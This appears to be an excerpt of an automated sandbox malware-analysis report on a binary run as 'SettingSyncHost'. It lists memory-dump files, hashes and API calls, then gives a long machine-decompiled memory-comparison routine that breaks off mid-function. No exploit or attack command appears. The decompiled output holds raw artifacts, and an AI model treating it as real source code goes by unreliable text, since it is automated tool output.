                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                      • Opcode ID: 30e5b94be8a6373bc22f01bc9e57ddbeb6b2e4668a74035ffd76585efdf4ea67
                                                                                                                                      • Instruction ID: 33d41af2ea9dda97b6738d5711dd6c3972015bc461b475d67fe0a4d86e22a5a1
                                                                                                                                      • Opcode Fuzzy Hash: 30e5b94be8a6373bc22f01bc9e57ddbeb6b2e4668a74035ffd76585efdf4ea67
                                                                                                                                      • Instruction Fuzzy Hash: EBE04631001A98ABCF276B66DD099693B2CFB80341F000514F80A8A6B1CBB5EC92CA81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EDFFA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5A10: GetLastError.KERNEL32(?,?,?,003DE7AE,?,?,00000000,?,003DE33E,?,?,?), ref: 003E5A15
                                                                                                                                        • Part of subcall function 003E5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,003DE33E,?,?,?), ref: 003E5AB3
                                                                                                                                      • EnumSystemLocalesW.KERNEL32(003EE120,00000001,00000000,?,-00000050,?,003EE74E,00000000,?,?,?,00000055,?), ref: 003EE06C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                      • String ID: N>
                                                                                                                                      • API String ID: 2417226690-4059378728
                                                                                                                                      • Opcode ID: 94abf7013569bdfcf6b8e9689c565a09833bb830529f85ff9b4047967e95a547
                                                                                                                                      • Instruction ID: 58e57180a9757c352478c0cba05fe727a3e7b05c4530e05a4a7992410981b6f3
                                                                                                                                      • Opcode Fuzzy Hash: 94abf7013569bdfcf6b8e9689c565a09833bb830529f85ff9b4047967e95a547
                                                                                                                                      • Instruction Fuzzy Hash: DF110C3B2007155FDB199F3AC8916BAB791FF84368B154A2DE94747B80D7717D42C740
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003D7CF0, Relevance: 1.9, APIs: 1, Instructions: 384filenetworkCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • InternetReadFile.WININET(?,?,000003FF,00000000), ref: 003D7DE1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileInternetRead
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 778332206-0
                                                                                                                                      • Opcode ID: 6b3b6af0961a41fc419fc24936ad491e270b2896bb8bc04a5fb3956bb441f615
                                                                                                                                      • Instruction ID: bfb34dc2cb53aa241360c236a18445fb311cb84d9811e8d2da7d1bbce31b4352
                                                                                                                                      • Opcode Fuzzy Hash: 6b3b6af0961a41fc419fc24936ad491e270b2896bb8bc04a5fb3956bb441f615
                                                                                                                                      • Instruction Fuzzy Hash: 25F13BF29102288BDB25CF14DD84BADB775AF89704F1486DAE608AB241DB716EC4CF58
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00395E1E, Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: cde5092ee6ac75e5c6963bd0c40e6ddc9bab64e2035cc99139032f467b9a4930
                                                                                                                                      • Instruction ID: 4901744267eaf946a45d7b18a4f53c68bde6c9a5547fe440d50d0502f39ae6ff
                                                                                                                                      • Opcode Fuzzy Hash: cde5092ee6ac75e5c6963bd0c40e6ddc9bab64e2035cc99139032f467b9a4930
                                                                                                                                      • Instruction Fuzzy Hash: 75B1E020E2AF404DD62396399832336B75CAFBB2D9F51D71BFD6674D62FB2185834140
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E7204, Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,003E71FF,?,?,00000008,?,?,003F4D4F,00000000), ref: 003E7431
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionRaise
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3997070919-0
                                                                                                                                      • Opcode ID: 7145e02a5cdcf22a8948938e95c558f4ddbfbe2dfa006ecd78014ccdba135f75
                                                                                                                                      • Instruction ID: 79bd68ffe0b64604b51af668a85654acee9df94b51dd44e12f158442852f8546
                                                                                                                                      • Opcode Fuzzy Hash: 7145e02a5cdcf22a8948938e95c558f4ddbfbe2dfa006ecd78014ccdba135f75
                                                                                                                                      • Instruction Fuzzy Hash: CDB16C35614659CFDB1ACF29C486B647BA0FF04364F268658E899CF2E1C335E982CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 0039C8A0, Relevance: 1.7, Strings: 1, Instructions: 489COMMONLIBRARYCODECrypto
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 99%
                                                                                                                                      			E0039C8A0(signed char* _a4, char _a8, signed int _a12) {
				signed int _t984;
				void* _t986;
				signed int _t988;
				void* _t989;
				void* _t991;
				void* _t993;
				void* _t994;
				void* _t996;
				void* _t998;
				void* _t1001;
				void* _t1003;
				void* _t1005;
				signed char* _t1006;
				void* _t1007;
				signed int _t1108;
				signed char* _t1111;
				signed char* _t1112;
				signed char* _t1113;
				signed char* _t1114;
				void* _t1134;
				signed int _t1135;
				void* _t1136;
				signed char* _t1137;
				signed char* _t1138;
				signed char* _t1139;
				void* _t1149;
				void* _t1151;
				void* _t1153;
				void* _t1156;
				void* _t1158;
				void* _t1160;
				void* _t1163;
				void* _t1165;
				void* _t1167;
				void* _t1170;
				void* _t1172;
				void* _t1174;
				void* _t1177;
				void* _t1179;
				void* _t1181;
				void* _t1184;
				void* _t1186;
				void* _t1188;
				void* _t1191;
				void* _t1193;
				void* _t1195;
				void* _t1198;
				void* _t1200;
				void* _t1202;

				_t1135 = _a12;
				_t984 = _t1135;
				if(_t984 == 0) {
					asm("rcr byte [edi+0x5e], 0x5d");
					return 0;
				}
				_t986 = _t984 - 1;
				if(_t986 == 0) {
					_t982 =  &_a8; // 0x39462f
					_t988 =  *_a4 & 0x000000ff;
					_t1108 =  *( *_t982) & 0x000000ff;
					L426:
					_t989 = _t988 - _t1108;
					if(_t989 == 0) {
						L439:
						return _t989;
					}
					_t958 = (0 | _t989 > 0x00000000) - 1; // -1
					return (_t989 > 0) + _t958;
				}
				_t991 = _t986 - 1;
				if(_t991 == 0) {
					_t1111 = _a4;
					_t974 =  &_a8; // 0x39462f
					_t1137 =  *_t974;
					_t993 = ( *_t1111 & 0x000000ff) - ( *_t1137 & 0x000000ff);
					if(_t993 == 0) {
						L435:
						_t988 = _t1111[1] & 0x000000ff;
						_t1108 = _t1137[1] & 0x000000ff;
						goto L426;
					}
					_t978 = (0 | _t993 > 0x00000000) - 1; // -1
					_t989 = (_t993 > 0) + _t978;
					if(_t989 != 0) {
						goto L439;
					}
					goto L435;
				}
				_t994 = _t991 - 1;
				if(_t994 == 0) {
					_t1112 = _a4;
					_t960 =  &_a8; // 0x39462f
					_t1138 =  *_t960;
					_t996 = ( *_t1112 & 0x000000ff) - ( *_t1138 & 0x000000ff);
					if(_t996 == 0) {
						L430:
						_t998 = (_t1112[1] & 0x000000ff) - (_t1138[1] & 0x000000ff);
						if(_t998 == 0) {
							L432:
							_t988 = _t1112[2] & 0x000000ff;
							_t1108 = _t1138[2] & 0x000000ff;
							goto L426;
						}
						_t970 = (0 | _t998 > 0x00000000) - 1; // -1
						_t989 = (_t998 > 0) + _t970;
						if(_t989 != 0) {
							goto L439;
						}
						goto L432;
					}
					_t964 = (0 | _t996 > 0x00000000) - 1; // -1
					_t989 = (_t996 > 0) + _t964;
					if(_t989 != 0) {
						goto L439;
					}
					goto L430;
				}
				if(_t994 == 1) {
					_t1113 = _a4;
					_t936 =  &_a8; // 0x39462f
					_t1139 =  *_t936;
					_t1001 = ( *_t1113 & 0x000000ff) - ( *_t1139 & 0x000000ff);
					if(_t1001 == 0) {
						L421:
						_t1003 = (_t1113[1] & 0x000000ff) - (_t1139[1] & 0x000000ff);
						if(_t1003 == 0) {
							L423:
							_t1005 = (_t1113[2] & 0x000000ff) - (_t1139[2] & 0x000000ff);
							if(_t1005 == 0) {
								L425:
								_t988 = _t1113[3] & 0x000000ff;
								_t1108 = _t1139[3] & 0x000000ff;
								goto L426;
							}
							_t952 = (0 | _t1005 > 0x00000000) - 1; // -1
							_t989 = (_t1005 > 0) + _t952;
							if(_t989 != 0) {
								goto L439;
							}
							goto L425;
						}
						_t946 = (0 | _t1003 > 0x00000000) - 1; // -1
						_t989 = (_t1003 > 0) + _t946;
						if(_t989 != 0) {
							goto L439;
						}
						goto L423;
					}
					_t940 = (0 | _t1001 > 0x00000000) - 1; // -1
					_t989 = (_t1001 > 0) + _t940;
					if(_t989 != 0) {
						goto L439;
					}
					goto L421;
				} else {
					_t2 =  &_a8; // 0x39462f
					_t1114 =  *_t2;
					_t1006 = _a4;
					_t1134 = 0x20;
					while(_t1135 >= _t1134) {
						if( *_t1006 ==  *_t1114) {
							_t1136 = 0;
							L16:
							if(_t1136 != 0) {
								L98:
								_t1007 = _t1136;
								L178:
								return _t1007;
							}
							if(_t1006[4] == _t1114[4]) {
								_t1136 = 0;
								L27:
								if(_t1136 != 0) {
									goto L98;
								}
								if(_t1006[8] == _t1114[8]) {
									_t1136 = 0;
									L38:
									if(_t1136 != 0) {
										goto L98;
									}
									if(_t1006[0xc] == _t1114[0xc]) {
										_t1136 = 0;
										L49:
										if(_t1136 != 0) {
											goto L98;
										}
										if(_t1006[0x10] == _t1114[0x10]) {
											_t1136 = 0;
											L60:
											if(_t1136 != 0) {
												goto L98;
											}
											if(_t1006[0x14] == _t1114[0x14]) {
												_t1136 = 0;
												L71:
												if(_t1136 != 0) {
													goto L98;
												}
												if(_t1006[0x18] == _t1114[0x18]) {
													_t1136 = 0;
													L82:
													if(_t1136 != 0) {
														goto L98;
													}
													if(_t1006[0x1c] == _t1114[0x1c]) {
														_t1136 = 0;
														L93:
														if(_t1136 != 0) {
															goto L98;
														} else {
															_t1006 =  &(_t1006[_t1134]);
															_t1114 =  &(_t1114[_t1134]);
															_t1135 = _t1135 - _t1134;
															continue;
														}
													}
													_t1149 = (_t1006[0x1c] & 0x000000ff) - (_t1114[0x1c] & 0x000000ff);
													if(_t1149 == 0) {
														L86:
														_t1151 = (_t1006[0x1d] & 0x000000ff) - (_t1114[0x1d] & 0x000000ff);
														if(_t1151 == 0) {
															L88:
															_t1153 = (_t1006[0x1e] & 0x000000ff) - (_t1114[0x1e] & 0x000000ff);
															if(_t1153 == 0) {
																L90:
																_t1136 = (_t1006[0x1f] & 0x000000ff) - (_t1114[0x1f] & 0x000000ff);
																if(_t1136 != 0) {
																	_t207 = (0 | _t1136 > 0x00000000) - 1; // -1
																	_t1136 = (_t1136 > 0) + _t207;
																}
																goto L93;
															}
															_t201 = (0 | _t1153 > 0x00000000) - 1; // -1
															_t1136 = (_t1153 > 0) + _t201;
															if(_t1136 != 0) {
																goto L98;
															}
															goto L90;
														}
														_t195 = (0 | _t1151 > 0x00000000) - 1; // -1
														_t1136 = (_t1151 > 0) + _t195;
														if(_t1136 != 0) {
															goto L98;
														}
														goto L88;
													}
													_t189 = (0 | _t1149 > 0x00000000) - 1; // -1
													_t1136 = (_t1149 > 0) + _t189;
													if(_t1136 != 0) {
														goto L98;
													}
													goto L86;
												}
												_t1156 = (_t1006[0x18] & 0x000000ff) - (_t1114[0x18] & 0x000000ff);
												if(_t1156 == 0) {
													L75:
													_t1158 = (_t1006[0x19] & 0x000000ff) - (_t1114[0x19] & 0x000000ff);
													if(_t1158 == 0) {
														L77:
														_t1160 = (_t1006[0x1a] & 0x000000ff) - (_t1114[0x1a] & 0x000000ff);
														if(_t1160 == 0) {
															L79:
															_t1136 = (_t1006[0x1b] & 0x000000ff) - (_t1114[0x1b] & 0x000000ff);
															if(_t1136 != 0) {
																_t181 = (0 | _t1136 > 0x00000000) - 1; // -1
																_t1136 = (_t1136 > 0) + _t181;
															}
															goto L82;
														}
														_t175 = (0 | _t1160 > 0x00000000) - 1; // -1
														_t1136 = (_t1160 > 0) + _t175;
														if(_t1136 != 0) {
															goto L98;
														}
														goto L79;
													}
													_t169 = (0 | _t1158 > 0x00000000) - 1; // -1
													_t1136 = (_t1158 > 0) + _t169;
													if(_t1136 != 0) {
														goto L98;
													}
													goto L77;
												}
												_t163 = (0 | _t1156 > 0x00000000) - 1; // -1
												_t1136 = (_t1156 > 0) + _t163;
												if(_t1136 != 0) {
													goto L98;
												}
												goto L75;
											}
											_t1163 = (_t1006[0x14] & 0x000000ff) - (_t1114[0x14] & 0x000000ff);
											if(_t1163 == 0) {
												L64:
												_t1165 = (_t1006[0x15] & 0x000000ff) - (_t1114[0x15] & 0x000000ff);
												if(_t1165 == 0) {
													L66:
													_t1167 = (_t1006[0x16] & 0x000000ff) - (_t1114[0x16] & 0x000000ff);
													if(_t1167 == 0) {
														L68:
														_t1136 = (_t1006[0x17] & 0x000000ff) - (_t1114[0x17] & 0x000000ff);
														if(_t1136 != 0) {
															_t155 = (0 | _t1136 > 0x00000000) - 1; // -1
															_t1136 = (_t1136 > 0) + _t155;
														}
														goto L71;
													}
													_t149 = (0 | _t1167 > 0x00000000) - 1; // -1
													_t1136 = (_t1167 > 0) + _t149;
													if(_t1136 != 0) {
														goto L98;
													}
													goto L68;
												}
												_t143 = (0 | _t1165 > 0x00000000) - 1; // -1
												_t1136 = (_t1165 > 0) + _t143;
												if(_t1136 != 0) {
													goto L98;
												}
												goto L66;
											}
											_t137 = (0 | _t1163 > 0x00000000) - 1; // -1
											_t1136 = (_t1163 > 0) + _t137;
											if(_t1136 != 0) {
												goto L98;
											}
											goto L64;
										}
										_t1170 = (_t1006[0x10] & 0x000000ff) - (_t1114[0x10] & 0x000000ff);
										if(_t1170 == 0) {
											L53:
											_t1172 = (_t1006[0x11] & 0x000000ff) - (_t1114[0x11] & 0x000000ff);
											if(_t1172 == 0) {
												L55:
												_t1174 = (_t1006[0x12] & 0x000000ff) - (_t1114[0x12] & 0x000000ff);
												if(_t1174 == 0) {
													L57:
													_t1136 = (_t1006[0x13] & 0x000000ff) - (_t1114[0x13] & 0x000000ff);
													if(_t1136 != 0) {
														_t129 = (0 | _t1136 > 0x00000000) - 1; // -1
														_t1136 = (_t1136 > 0) + _t129;
													}
													goto L60;
												}
												_t123 = (0 | _t1174 > 0x00000000) - 1; // -1
												_t1136 = (_t1174 > 0) + _t123;
												if(_t1136 != 0) {
													goto L98;
												}
												goto L57;
											}
											_t117 = (0 | _t1172 > 0x00000000) - 1; // -1
											_t1136 = (_t1172 > 0) + _t117;
											if(_t1136 != 0) {
												goto L98;
											}
											goto L55;
										}
										_t111 = (0 | _t1170 > 0x00000000) - 1; // -1
										_t1136 = (_t1170 > 0) + _t111;
										if(_t1136 != 0) {
											goto L98;
										}
										goto L53;
									}
									_t1177 = (_t1006[0xc] & 0x000000ff) - (_t1114[0xc] & 0x000000ff);
									if(_t1177 == 0) {
										L42:
										_t1179 = (_t1006[0xd] & 0x000000ff) - (_t1114[0xd] & 0x000000ff);
										if(_t1179 == 0) {
											L44:
											_t1181 = (_t1006[0xe] & 0x000000ff) - (_t1114[0xe] & 0x000000ff);
											if(_t1181 == 0) {
												L46:
												_t1136 = (_t1006[0xf] & 0x000000ff) - (_t1114[0xf] & 0x000000ff);
												if(_t1136 != 0) {
													_t103 = (0 | _t1136 > 0x00000000) - 1; // -1
													_t1136 = (_t1136 > 0) + _t103;
												}
												goto L49;
											}
											_t97 = (0 | _t1181 > 0x00000000) - 1; // -1
											_t1136 = (_t1181 > 0) + _t97;
											if(_t1136 != 0) {
												goto L98;
											}
											goto L46;
										}
										_t91 = (0 | _t1179 > 0x00000000) - 1; // -1
										_t1136 = (_t1179 > 0) + _t91;
										if(_t1136 != 0) {
											goto L98;
										}
										goto L44;
									}
									_t85 = (0 | _t1177 > 0x00000000) - 1; // -1
									_t1136 = (_t1177 > 0) + _t85;
									if(_t1136 != 0) {
										goto L98;
									}
									goto L42;
								}
								_t1184 = (_t1006[8] & 0x000000ff) - (_t1114[8] & 0x000000ff);
								if(_t1184 == 0) {
									L31:
									_t1186 = (_t1006[9] & 0x000000ff) - (_t1114[9] & 0x000000ff);
									if(_t1186 == 0) {
										L33:
										_t1188 = (_t1006[0xa] & 0x000000ff) - (_t1114[0xa] & 0x000000ff);
										if(_t1188 == 0) {
											L35:
											_t1136 = (_t1006[0xb] & 0x000000ff) - (_t1114[0xb] & 0x000000ff);
											if(_t1136 != 0) {
												_t77 = (0 | _t1136 > 0x00000000) - 1; // -1
												_t1136 = (_t1136 > 0) + _t77;
											}
											goto L38;
										}
										_t71 = (0 | _t1188 > 0x00000000) - 1; // -1
										_t1136 = (_t1188 > 0) + _t71;
										if(_t1136 != 0) {
											goto L98;
										}
										goto L35;
									}
									_t65 = (0 | _t1186 > 0x00000000) - 1; // -1
									_t1136 = (_t1186 > 0) + _t65;
									if(_t1136 != 0) {
										goto L98;
									}
									goto L33;
								}
								_t59 = (0 | _t1184 > 0x00000000) - 1; // -1
								_t1136 = (_t1184 > 0) + _t59;
								if(_t1136 != 0) {
									goto L98;
								}
								goto L31;
							}
							_t1191 = (_t1006[4] & 0x000000ff) - (_t1114[4] & 0x000000ff);
							if(_t1191 == 0) {
								L20:
								_t1193 = (_t1006[5] & 0x000000ff) - (_t1114[5] & 0x000000ff);
								if(_t1193 == 0) {
									L22:
									_t1195 = (_t1006[6] & 0x000000ff) - (_t1114[6] & 0x000000ff);
									if(_t1195 == 0) {
										L24:
										_t1136 = (_t1006[7] & 0x000000ff) - (_t1114[7] & 0x000000ff);
										if(_t1136 != 0) {
											_t51 = (0 | _t1136 > 0x00000000) - 1; // -1
											_t1136 = (_t1136 > 0) + _t51;
										}
										goto L27;
									}
									_t45 = (0 | _t1195 > 0x00000000) - 1; // -1
									_t1136 = (_t1195 > 0) + _t45;
									if(_t1136 != 0) {
										goto L98;
									}
									goto L24;
								}
								_t39 = (0 | _t1193 > 0x00000000) - 1; // -1
								_t1136 = (_t1193 > 0) + _t39;
								if(_t1136 != 0) {
									goto L98;
								}
								goto L22;
							}
							_t33 = (0 | _t1191 > 0x00000000) - 1; // -1
							_t1136 = (_t1191 > 0) + _t33;
							if(_t1136 != 0) {
								goto L98;
							}
							goto L20;
						}
						_t1198 = ( *_t1006 & 0x000000ff) - ( *_t1114 & 0x000000ff);
						if(_t1198 == 0) {
							L9:
							_t1200 = (_t1006[1] & 0x000000ff) - (_t1114[1] & 0x000000ff);
							if(_t1200 == 0) {
								L11:
								_t1202 = (_t1006[2] & 0x000000ff) - (_t1114[2] & 0x000000ff);
								if(_t1202 == 0) {
									L13:
									_t1136 = (_t1006[3] & 0x000000ff) - (_t1114[3] & 0x000000ff);
									if(_t1136 != 0) {
										_t25 = (0 | _t1136 > 0x00000000) - 1; // -1
										_t1136 = (_t1136 > 0) + _t25;
									}
									goto L16;
								}
								_t19 = (0 | _t1202 > 0x00000000) - 1; // -1
								_t1136 = (_t1202 > 0) + _t19;
								if(_t1136 != 0) {
									goto L98;
								}
								goto L13;
							}
							_t13 = (0 | _t1200 > 0x00000000) - 1; // -1
							_t1136 = (_t1200 > 0) + _t13;
							if(_t1136 != 0) {
								goto L98;
							}
							goto L11;
						}
						_t7 = (0 | _t1198 > 0x00000000) - 1; // -1
						_t1136 = (_t1198 > 0) + _t7;
						if(_t1136 != 0) {
							goto L98;
						}
						goto L9;
					}
					if(_t1135 > 0x1f) {
						L177:
						_t1007 = 0;
						goto L178;
					}
					switch( *((intOrPtr*)(_t1135 * 4 +  &M0039DD74))) {
						case 0:
							goto L177;
						case 1:
							L256:
							__ecx =  *(__ecx - 1) & 0x000000ff;
							__eax =  *(__eax - 1) & 0x000000ff;
							__eax = __eax - __ecx;
							if(__eax != 0) {
								__ecx = 0;
								_t567 = (0 | __eax > 0x00000000) - 1; // -1
								__eax = (__eax > 0) + _t567;
							}
							goto L178;
						case 2:
							L335:
							if( *(__eax - 2) ==  *(__ecx - 2)) {
								goto L177;
							}
							goto L336;
						case 3:
							L416:
							__esi =  *(__eax - 3) & 0x000000ff;
							__edx =  *(__ecx - 3) & 0x000000ff;
							__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
							if(__esi == 0) {
								L336:
								__edx =  *(__ecx - 2) & 0x000000ff;
								__esi =  *(__eax - 2) & 0x000000ff;
								__esi = ( *(__eax - 2) & 0x000000ff) - ( *(__ecx - 2) & 0x000000ff);
								if(__esi == 0) {
									goto L256;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								if(__edx != 0) {
									L418:
									__eax = __edx;
									goto L178;
								}
								goto L256;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							if(__edx == 0) {
								goto L336;
							}
							goto L418;
						case 4:
							L165:
							__edx =  *(__eax - 4);
							if( *(__eax - 4) ==  *(__ecx - 4)) {
								__eax = 0;
								L176:
								if(__eax != 0) {
									goto L178;
								}
								goto L177;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 4) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
							if(__esi == 0) {
								L168:
								__esi =  *(__eax - 3) & 0x000000ff;
								__edx =  *(__ecx - 3) & 0x000000ff;
								__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
								if(__esi == 0) {
									L170:
									__esi =  *(__eax - 2) & 0x000000ff;
									__edx =  *(__ecx - 2) & 0x000000ff;
									__esi = ( *(__eax - 2) & 0x000000ff) - ( *(__ecx - 2) & 0x000000ff);
									if(__esi == 0) {
										L173:
										__eax =  *(__eax - 1) & 0x000000ff;
										__eax = __eax - __ecx;
										if(__eax != 0) {
											__ecx = 0;
											_t385 = (0 | __eax > 0x00000000) - 1; // -1
											__eax = (__eax > 0) + _t385;
										}
										goto L176;
									}
									__edx = 0;
									__edx = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									if(__edx == 0) {
										goto L173;
									}
									L172:
									__eax = __edx;
									goto L176;
								}
								__edx = 0;
								__edx = 0 | __esi > 0x00000000;
								__edx = (__esi > 0) + (__esi > 0) - 1;
								if(__edx != 0) {
									goto L172;
								}
								goto L170;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							if(__edx != 0) {
								goto L172;
							}
							goto L168;
						case 5:
							L245:
							__edx =  *(__eax - 5);
							if( *(__eax - 5) ==  *(__ecx - 5)) {
								__esi = 0;
								L255:
								if(__esi != 0) {
									goto L98;
								}
								goto L256;
							}
							__esi = __dl & 0x000000ff;
							__edx =  *(__ecx - 5) & 0x000000ff;
							__esi = (__dl & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
							if(__esi == 0) {
								L248:
								__esi =  *(__eax - 4) & 0x000000ff;
								__edx =  *(__ecx - 4) & 0x000000ff;
								__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
								if(__esi == 0) {
									L250:
									__esi =  *(__eax - 3) & 0x000000ff;
									__edx =  *(__ecx - 3) & 0x000000ff;
									__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
									if(__esi == 0) {
										L252:
										__esi =  *(__eax - 2) & 0x000000ff;
										__edx =  *(__ecx - 2) & 0x000000ff;
